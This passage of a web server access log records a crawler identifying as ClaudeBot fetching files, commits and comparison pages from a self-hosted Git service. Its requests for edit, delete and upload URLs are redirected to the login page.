-[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 216.73.216.188] [Length 11850] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/images" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 32564] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 216.73.216.188] [Length 14392] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 10865] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2Fmain.py" [Client 216.73.216.188] [Length 34476] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13326] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 216.73.216.188] [Length 11304] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/favicon.ico" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 20915] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 216.73.216.188] [Length 11043] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/services" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" [Client 216.73.216.188] [Length 10560] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/services" -[15/Feb/2026:10:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/favicon.ico" -[15/Feb/2026:10:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 17366] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11526] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 216.73.216.188] [Length 31005] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 216.73.216.188] [Length 11481] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 21530] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12448] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2FOpcConnectionTest.csproj" [Client 216.73.216.188] [Length 21953] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 8439] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj" [Client 216.73.216.188] [Length 32906] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10496] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" [Client 216.73.216.188] [Length 398434] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11897] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 11994] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" [Client 216.73.216.188] [Length 9919] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 216.73.216.188] [Length 11263] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs?display=rendered" [Client 216.73.216.188] [Length 11148] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/tsconfig.json" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10424] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" [Client 216.73.216.188] [Length 82535] [Gzip 10.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 11545] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/README.md" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14275] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 9969] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13509] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2F.NETCoreApp%2CVersion%3Dv8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 21421] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/tsconfig.json" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16154] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 216.73.216.188] [Length 11666] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/css" [Client 216.73.216.188] [Length 10020] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2Fapp%2Ffetcher.py" [Client 216.73.216.188] [Length 32565] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10666] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/index.html" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json?display=rendered" [Client 216.73.216.188] [Length 11152] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10324] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 216.73.216.188] [Length 14214] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" [Client 216.73.216.188] [Length 9940] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10625] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 11179] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/package.json" [Client 216.73.216.188] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 10341] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 216.73.216.188] [Length 16033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10054] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 